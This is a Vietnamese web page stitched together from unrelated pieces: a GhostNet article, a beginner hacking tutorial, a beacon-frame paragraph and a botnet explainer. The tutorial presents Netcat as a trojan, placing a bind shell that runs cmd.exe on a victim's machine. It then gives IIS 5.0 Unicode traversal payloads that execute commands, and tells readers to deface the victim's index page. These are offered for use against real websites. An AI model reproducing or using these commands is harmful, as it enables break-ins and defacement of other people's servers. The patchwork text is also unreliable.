Để đầu tư CK thành công cần kiến thức, thông tin, nghệ thuật và may mắn

GhostNet lả tên được đặt cho một nhóm chuyên xâm nhập hệ thống điện toán thế giới, phần lớn xuất phát từ Trung Quốc, đã vào được tối thiểu 1295 hệ thống của chính quyền cũng như tư nhân tại 103 quốc gia toàn cầu, kể cả máy điện toán của đức Ðạt Lai Lạt Ma,[1] theo một bản báo cáo đưa ra vào Chủ Nhật ngày 29 tháng 3, 2009.[2]
Mục lục
[ẩn]

* 1 Khám phá
* 2 Liên quan đến Trung Quốc
* 3 Nơi khác
* 4 Chú thích
* 5 Liên kết ngoài

[sửa] Khám phá
GhostNet được khám phá và đặt tên bởi các nhà nghiên cứu từ Trung tâm Nghiên cứu Quốc tế Munk (hình).

Các chuyên gia ở Trung tâm Nghiên cứu Quốc tế Munk tại viện đại học Toronto đã soạn thảo bản báo cáo về việc do thám đã được thực hiện từ các máy điện toán hầu như hoàn toàn đặt ở Trung Quốc. "Có đến 30 phần trăm những hệ thống bị xâm nhập được coi là những mục tiêu có giá trị cao và kể cả các máy đặt ở các bộ ngoại giao, tòa đại sứ, tổ chức quốc tế, cơ quan truyền thông, cơ quan phi chính phủ," theo bản báo cáo.[3]

Cuộc điều tra khởi sự khi văn phòng của đức Ðạt Lai Lạt Ma nhờ họ xem xét hệ thống điện toán để coi có bị xâm nhập hay không. Việc này đã dẫn đến họ đến một nhóm đã xâm nhập vào ít nhất 1.295 máy điện toán trong gần hai năm. Một số máy này được đặt trong các trung tâm Phật giáo Tây Tạng ở Ấn Ðộ, Bruxelles, Luân Đôn và New York.[4]

"Bản báo cáo này là một lời cảnh tỉnh," các tác giả bản báo cáo nói. "Sự kiện có nhiều máy điện toán đặt ở các nơi quan trọng bị nhóm này xâm nhập cho thấy sự dễ dàng bị do thám qua internet."

Tuy nhiên các nhà nghiên cứu nói không có dấu hiệu nào cho thấy các văn phòng chính phủ Hoa Kỳ bị xâm nhập, nhưng một máy điện toán của Tổ chức Hiệp ước Bắc Đại Tây Dương đã bị dò xét trong nửa ngày và các máy điện toán của tòa đại sứ Ấn Ðộ tại Washington DC đã bị xâm nhập.[5]

[sửa] Liên quan đến Trung Quốc

Tuy nhiên, các nhà nghiên cứu không thể hoàn toàn chắc chắn rằng chính quyền Trung Quốc trực tiếp dính líu vào nỗ lực này và nhấn mạnh rằng nếu cho tất cả các hoạt động do thám này là do chính quyền Trung Quốc thực hiện là sai lầm.[6]

"Nếu nhìn vào con số người ta có thể có một nhận định khác," theo bản báo cáo. "Trung Quốc hiện nay là quốc gia có nhiều người sử dụng internet nhất trên thế giới. Chỉ riêng số người trẻ sử dụng internet ở đây có thể là lý do gây ra những vụ do thám từ Trung Quốc."[7]

[sửa] Nơi khác

Các nhà nghiên cứu tin rằng ngoài việc do thám máy điện toán của đức Ðạt Lai Lạt Ma, nhóm này cũng đã xâm nhập vào hệ thống của chính quyền ở vùng Nam Á và Ðông Nam Á. Nhóm này tiếp tục xâm nhập và dò xét thêm hơn một chục hệ thống điện toán mỗi tuần.

Các công cụ cần thiết để hack Web :
_ Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng trên máy của mình để test lỗi . Nhưng đối với các bạn mới “vào nghề” thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân được nhanh chóng nhất . Sau đây là một số công cụ bạn cần phải có trên máy “làm ăn” của mình :

_ Công cụ thứ 1 : Một cái proxy dùng để che dấu IP và vượt tường lửa khi cần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé ) .
_ Công cụ thứ 2 : Bạn cần có 1 shell account, cái này thực sự quan trọng đối với bạn . Một shell account tốt là 1 shell account cho phép bạn chạy các chương trình chính như nslookup, host (http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32), dig, ping, traceroute, telnet, ssh, ftp,...và shell account đó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) các exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác.
Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng hơn DOS . Thông thường khi bạn cài Unix thì bạn sẽ có 1 shell account, nếu bạn không cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có ai đó cài Unix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet (Start -- > Run -- > gõ Telnet) để dùng shell account đó. Sau đây là 1 số địa chỉ bạn có thể đăng ký free shell account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.ht ml
http://www.ultrashell.net/
_Công cụ thứ 3 : NMAP là Công cụ quét cực nhanh và mạnh. Có thể quét trên mạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xem những dịch vụ nào đang chạy trên server (http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32) (services / ports : webserver , ftpserver , pop3,...),server đang dùng hệ điều hành gì,loại tường lửa mà server (http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32) sử dụng,...và rất nhiều tính năng khác.Nói chung NMAP hỗ trợ hầu hết các kỹ thuật quét như : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP được đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quản trị mạng trên thế giới.
Mọi thông tin về NMAP bạn tham khảo tại http://www.insecure.org/ .
_ Công cụ thứ 4 : Stealth HTTP Security Scanner là công cụ quét lỗi bảo mật tuyệt vời trên Win32. Nó có thể quét được hơn 13000 lỗi bảo mật và nhận diện được 5000 exploits khác.
_ Công cụ thứ 5 : IntelliTamper là công cụ hiển thị cấu trúc của một Website gồm những thư mục và file nào, nó có thể liệt kê được cả thư mục và file có set password. Rất tiện cho việc Hack Website vì trước khi bạn Hack một Website thì bạn phải nắm một số thông tin của Admin và Website đó.
_ Công cụ thứ 6 : Netcat là công cụ đọc và ghi dữ liệu qua mạng thông qua giao thức TCP hoặc UDP. Bạn có thể dùng Netcat 1 cách trực tiếp hoặc sử dụng chương trình script khác để điều khiển Netcat. Netcat được coi như 1 exploitation tool do nó có thể tạo được liên kết giữa bạn và server (http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32) cho việc đọc và ghi dữ liệu ( tất nhiên là khi Netcat đã được cài trên 1 server bị lỗI ). Mọi thông tin về Netcat bạn có thể tham khảo tại http://www.l0pht.com/ .
_ Công cụ thứ 7 : Active Perl là công cụ đọc các file Perl đuôi *.pl vì các exploit thường được viết bằng Perl . Nó còn được sử dụng để thi hành các lệnh thông qua các file *.pl .
_ Công cụ thứ 8 : Linux là hệ điều hành hầu hết các hacker đều sử dụng.
_ Công cụ thứ 9 : L0phtCrack là công cụ số một để Crack Password của Windows NT/2000 .
_ Cách Download tôi đã bày rồi nên không nói ở đây , các bạn khi Download nhớ chú ý đến các phiên bản của chúng , phiên bản nào có số lớn nhất thì các bạn hãy Down về mà sài vì nó sẽ có thêm một số tính năng mà các phiên bản trước chưa có . Nếu down về mà các bạn không biết sử dụng thì tìm lại các bài viết cũ có hướng dẫn bên Box “Đồ nghề” . Nếu vẫn không thấy thì cứ post bài hỏi , các bạn bên đó sẽ trả lời cho bạn .

48 . ) Hướng dẫn sử dụng Netcat :

a . ) Giới thiệu : Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó vì nó rất mạnh và tiện dụng . Do đó bạn cần biết một chút về Netcat .
b . ) Biên dịch :
_ Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.
- hiệu chỉnh file netcat.c bằng vi: vi netcat.c
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu ``/``: // res_init();
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):

#define GAPING_SECURITY_HOLE
#define TELNET

- biên dịch: make linux
- chạy thử: ./nc -h
- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ``:.``
PATH=/sbin:/usr/sbin:...:.
_ Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.
c . ) Các tùy chọn của Netcat :
_ Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

CODE
C:\ > nc -h
connect to somewhere: nc [-options] hostname port [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d ----------- tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)
-e prog --- thi hành chương trình prog, thường dùng trong chế độ lắng nghe
-h ----------- gọi hướng dẫn
-i secs ----- trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi
-l ------------- đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến
-L ------------ buộc Netcat ``cố`` lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-n ------------ chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS
-o ------------ file ghi nhật kí vào file
-p port ----- chỉ định cổng port
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)
-s addr ----- giả mạo địa chỉ IP nguồn là addr
-t ------------- không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.
-u ------------- dùng UDP(mặc định netcat dùng TCP)
-v ------------- hiển thị chi tiết các thông tin về kết nối hiện tại.
-vv ----------- sẽ hiển thị thông tin chi tiết hơn nữa.
-w secs ---- đặt thời gian timeout cho mỗi kết nối là secs mili giây
-z ------------- chế độ zero I/O, thường được sử dụng khi scan port


Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080

d . ) Tìm hiểu Netcat qua các VD :

_ Chộp banner (http://www.ddth.com/autolink.php?id=12&script=showthread&forumid=32) của web server :

Ví dụ: nc đến 172.16.84.2, cổng 80

CODE
C:\ > nc 172.16.84.2 80
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html


Để biết thông tin chi tiết về kết nối, bạn có thể dùng –v ( -vv sẽ
cho biết các thông tin chi tiết hơn nữa)

C:\ > nc -vv 172.16.84.1 80

CODE
172.16.84.1: inverse host (http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32) lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: ``0-cec-3899eaea``
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK


Nếu muốn ghi nhật kí, hãy dùng -o . Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem thử nó đã ghi những gì nhé :

CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: ``0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....


dấu < nghĩa là server gởi đến netcat
dấu > nghĩa là netcat gởi đến server

_ Quét cổng :
Bạn hãy chạy netcat với tùy chọn –z . Nhưng để quét cổng nhanh hơn, bạn hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1- > 500) của host (http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32)

CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open


nếu bạn cần scan các cổng UDP, dùng -u

CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open


_ Biến Netcat thành một trojan :
Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l ( listen ) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe ( đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

CODE
E:\ > nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error


Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

CODE
C:\ > nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
E:\ > cd test
cd test
E:\test > dir /w
dir /w
Volume in drive E has no label.
Volume ****** Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C:\test > exit
exit
sent 20, rcvd 450: NOTSOCK


Như các bạn đã thấy , ta có thể làm những gì trên máy của nạn nhân rồi , chỉ cần một số lệnh cơ bản , ta đã chiếm được máy tính của đối phương , các bạn hãy xem tiếp nhé :

CODE
E:\ > nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...?
?


Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s<địa_chỉ_ip_của_máy_này > . Ví dụ:

CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe
...
E:\ > nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - > lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?
?


Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.
Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.

( Dựa theo bài viết của huynh Vicky )

49 . ) Kỹ thuật hack IIS server 5.0 :

_ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để ta có thể khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các phiên bản trước tôi không đề cập đến . Bây giờ tôi sẽ bày các bạn cách hack thông qua công cụ activeperl và IE , các bạn có thể vận dụng cho các trang Web ở VN vì chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé .
_ Trước hết các bạn hãy download activeperl và Unicode.pl .
_ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay không :

CODE
telnet < tên trang Web > 80
GET HEAD / HTTP/1.0


Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các bạn hãy thay đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v…
_ Sau khi đã xác định được mục tiêu các bạn vào DOS gõ :

CODE
perl unicode.pl
Host: ( gõ địa chỉ server mà các bạn muốn hack )
Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đã telnet trước đó ) .


_ Các bạn sẽ thấy bảng liệt kê lỗi ( đã được lập trình (http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32) trong Unicode.pl ) như sau :

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe ?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+
[14]/m c/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0 \%80\%af../winnt/system32/cmd.exe?/c+
[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[17]/iimpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+


Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất cả những lỗi như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà thôi .
Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi sẽ ra IE và nhập đoạn mã tương ứng trên Address :

http://www.xxx.com/scripts/..%c1%p (http://www.xxx.com/scripts/..%c1%25p) c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 3
hoặc
http://www.xxx.com/scripts/..%c1%1 (http://www.xxx.com/scripts/..%c1%251) c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 7

Đến đây các bạn đã có thể xâm nhập vào server (http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32) của nạn nhân rồi đó , các bạn hãy sử dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường các trang Web nằm ở thư mục vinetpub\wwwroot , các bạn vào được rồI thì chỉ cần thay index.html vớI tên hack by …. Là được rồi , đừng quậy họ nhé . 172.16.106.1

Theo http://hauionline.com

Beacon frames are part of the IEEE 802.11 wireless network protocol.

Beacon Frames are frames that have control information and are transmitted in each of the 11 channels and help a wireless station to identify nearby wireless access points (AP) in passive scanning mode. They tell the stations in the Basic Service Set (BSS) about the existence of the network. They can also be transmitted by the AP for polling purposes. The Beacon Frame sent by the AP contains control information and can be used by Mobile stations to locate an AP if it is on active scanning mode.

Bot & Botnet tấn công server (

Xem chi tiet tai: http://www.vietprogrammer.com/webmaster/3510-bot-botnet-tan-cong-server.html

1. Lời nói đầu
Internet ngày càng phát triển, cùng với nó các mạng botnet được sinh ra một cách bí mật và tiềm ẩn những nguy cơ lớn đối với an ninh mạng. Số lượng và kích cỡ botnet ngày càng tăng. Người ta đã tìm thấy và gỡ bỏ nhiều botnet trên Internet. Cảnh sát Hà Lan đã tìm thấy một botnet gồm 1.5 triệu nút và ISP Telenor của Na Uy đã dỡ bỏ một botnet 10.000 nút. Ở Việt Nam điển hình là vụ tấn công từ chối dịch vụ Flash-DDoS bằng botnet vào trang thương mại Việt Cơ (2006) và gần đây nhất là vụ tấn công DDoS hàng loạt các site như 5giay.vn, nhatnghe.vn,bkav.com.vn (của BKIS – Trung tâm an ninh mạng ĐHBKHN) ( tháng 09/2008 ) bằng botnet với số lượng máy bị kiểm soát lên đến hàng ngàn. Người ta đã khởi động các hoạt động hợp tác quốc tế lớn nhằm dập tắt các botnet. Vậy botnet là gì ? Botnet hình thành và hoạt động như thế nào? Các nguy cơ của botnet ? Bài viết này tôi sẽ đề cập đến IRC botnet và trả lời các câu hỏi trên.

*
o DoS và DDoS

Một cuộc tấn công từ chối dịch vụ (tấn công DoS) hay tấn công từ chối dịch vụ phân tán (tấn công DDoS) là sự cố gắng làm cho tài nguyên của một máy tính không thể sử dụng được nhằm vào những người dùng của nó. Mặc dù phương tiện để tiến hành, động cơ, mục tiêu của tấn công từ chối dịch vụ là khác nhau, nhưng nói chung nó gồm có sự phối hợp, sự cố gắng ác ý của một người hay nhiều người để chống lại Internet site hoặc service (dịch vụ Web) vận hành hiệu quả hoặc trong tất cả, tạm thời hay một các không xác định. Thủ phạm tẩn công từ chối dịch vụ nhằm vào các mục tiêu site hay server tiêu biểu như ngân hàng, cổng thanh toán thẻ tín dụng và thậm chí DNS root servers.
Một phương thức tấn công phổ biến kéo theo sự bão hoà máy mục tiêu với các yêu cầu liên lạc bên ngoài, đến mức nó không thể đâp ứng giao thông hợp pháp, hoặc dáp ứng quá chậm. Trong điều kiện chung, các cuộc tấn công DoS được bổ sung bởi ép máy mục tiêu khởi động lại hoặc tiêu thụ hết tài nguyên của nó đến mức nó không cung cấp dịch vụ, hoặc làm tắc nghẽn liên lạc giữa người sử dụng và nạn nhân.
Tấn công từ chối dịch vụ đựoc lưu ý sự vi phạm chính sách sử dụng đúng internet của IAB(Internet Architecture Board). Chúng cũng cấu thành sự vi phạm luật dân sự.


Phương pháp DoS truyền thống sử dụng một máy tính đơn gửi một số lượng lớn các yêu cầu (flooding requests) đến máy tính đơn khác. Mô hình DDoS sử dụng nhiều máy tính tấn công một mục tiêu đơn nhất. DDoS sử dụng mạng botnet để tấn công, về mặt lý thuyết khi mạng botnet này đủ lớn thì mục tiêu không thể chống đỡ nổi hơn nữa phương pháp này tạo ra các truy nhập hợp lệ khiến việc xác định nơi phát động tấn công là một khó khăn rất lớn.


*
o Internet Relay Chat (IRC)

IRC được sáng tạo ra bởi Jarkko Oikarinen (bí danh "WiZ") vào khoảng cuối tháng 8 năm 1988 để thay thế một chương trình có tên là MUT (MultiUser Talk) trên một kênh BBS gọi là OuluBox tại Phần Lan. Ông tìm được cảm hứng cho dự án của mình từ hệ thống Bitnet Relay Chat của mạng Bitnet.
IRC được nhiều người chú ý đến từ khi nó được dùng sau tấm màn sắt (Iron Curtain) để viết phóng sự trực tuyến về sự sụp đổ của Liên Bang Xô Viết trong khi tất cả các phương tiện truyền thông khác không hoạt động được. Thời gian gần đây, nó cũng được dùng một cách tương tự để viết phóng sự trong trận chiến giữa Kuwait và Iraq.
IRC là chữ viết tắt từ cụm từ Internet Relay Chat trong tiếng Anh. IRC là một dạng liên lạc cấp tốc qua mạng Internet. Nó được thiết kế với mục đích chính là cho phép các nhóm người trong một phòng thảo luận (channel) liên lạc với nhau. Tuy nhiên, nó cũng cho phép hai người dùng liên lạc riêng nếu họ thích.
Hiện nay IRC là mạng trò chuyện trực tuyến lớn, có vài triệu kênh trên máy phục vụ trên khắp thế giới. Giao thức viễn thông này cũ hơn IM; IRC từng là hoàn toàn đựa vào nhập thô ASCII. Tuy nhiên, hiện thời có mốt số ứng dụng đồ họa làm cho dễ sử dụng IRC hơn, gần bằng dùng IM.

Hình 01. Mô hình mạng IRC


Ngoài chát, IRC còn dùng để chia sẻ tập tin và tư liệu theo hình thức mạng ngang hàng.
Có nhiều ứng dụng khách IRC cho người dùng trên bất kỳ hệ điều hành. Một ứng dụng phổ biến là XChat. XChat là phần mềm tự do trên Linux/BSD, mặc dù phiên bản trên Windows là phần mềm dùng thử (30 ngày), cũng đã dịch sang tiếng Việt.
Conversation là một thí dụ của ứng dụng khách IRC mới, dễ dùng, đựa vào đồ họa. Không cần học hiểu lại cách sử dụng lệnh IRC.
Các ứng dụng khách Jabber cũng có khả năng trò chuyện qua IRC, nhưng chưa có truyền tải hữu hiệu.
Chương trình thông dụng khác để truy cập vào các máy chủ IRC là KVIrc và mIRC. mIRC là một phần mềm chia sẻ (shareware) dành cho người sử dụng IRC trên Windows (không hoạt động trên các hệ điều hành khác như Linux, Mac OS, PalmOS, Epoc, Atari's...), được sáng tạo, phát triển và đăng kí bản quyền bởi Khaled Mardam-Bey.


*
o Bot và botnet

Bot hay rôbôt mạng là các ứng dụng phần mềm chạy các tác vụ tự động hóa trên mạng. Thông thường, bot thực hiện các tác vụ đơn giản và có cấu trúc lặp đi lặp lại với một tần suất cao hơn nhiều so với khả năng của một soạn thảo viên là con người. Ứng dụng rộng lớn của bot là trong duyệt tự động Web theo kiểu bò loang (web spidering), trong đó một chương trình tự động tìm kiếm, phân tích và sắp xếp thông tin từ các máy chủ web với tốc độ cao hơn nhiều lần tốc độ của con người. Mỗi máy chủ có một file có tên robots.txt chứa các quy tắc cho việc bò loang tự động tại máy chủ đó, đây là các quy tắc mà con bot cần tuân theo.
Bot là viết tắt của robot, tức các chương trình tự động hoá (chứ không phải là người máy như nghĩa chúng ta vẫn gọi) thường xuyên được sử dụng trong thế giới Internet. Một ví dụ về bot đó là search enginer Người ta định nghĩa spider được dùng bởi các công cụ tìm kiếm trực tuyến, ánh xạ website và phần mềm đáp ứng theo yêu cầu trên IRC (như eggdrop) là robot.
Bên cạnh các ứng dụng kể trên, bot còn có thể được cài đặt tại nơi đòi hỏi tốc độ phản ứng cao hơn tốc độ của con người (chẳng hạn bot trò chơi điện tử và bot tại các trang web bán đấu giá) hoặc trong các tình huống cần đến sự bắt chước các hoạt động của con người (chẳng hạn các chatbot - bot nói chuyện).
Botnet là từ chỉ một tập hợp các rô bôt phần mềm hoặc các con bot hoạt động một cách tự chủ. Từ này còn được dùng để chỉ một mạng các máy tính sử dụng phần mềm tính toán phân tán.
Tuy từ "botnet" có thể dùng để chỉ một nhóm bot bất kỳ, chẳng hạn IRC bot, từ này thường được dùng để chỉ một tập hợp các máy tính đã bị tấn công và thỏa hiệp và đang chạy các chương trình độc hại, thường là sâu máy tính, trojan horse hay các cửa hậu, dưới cùng một hạ tầng cơ sở lệnh và điều khiển. Một chương trình chỉ huy botnet (botnet's originator hay bot herder) có thể điều khiển cả nhóm bot từ xa, thường là qua một phương tiện chẳng hạn như IRC, và thường là nhằm các mục đích bất chính. Mỗi con bot thường chạy ẩn và tuân theo chuẩn RFC 1459 (IRC). Thông thường, kẻ tạo botnet trước đó đã thỏa hiệp một loạt hệ thống bằng nhiều công cụ đa dạng (tràn bộ nhớ đệm, ...). Các bot mới hơn có thể tự động quét môi trường của chúng và tự lan truyền bản thân bằng cách sử dụng các lỗ hổng an ninh và mật khẩu yếu. Nếu một con bot có thể quét và tự lan truyền qua càng nhiều lỗ hổng an ninh, thì nó càng trở nên giá trị đối với một cộng đồng điều khiển botnet.
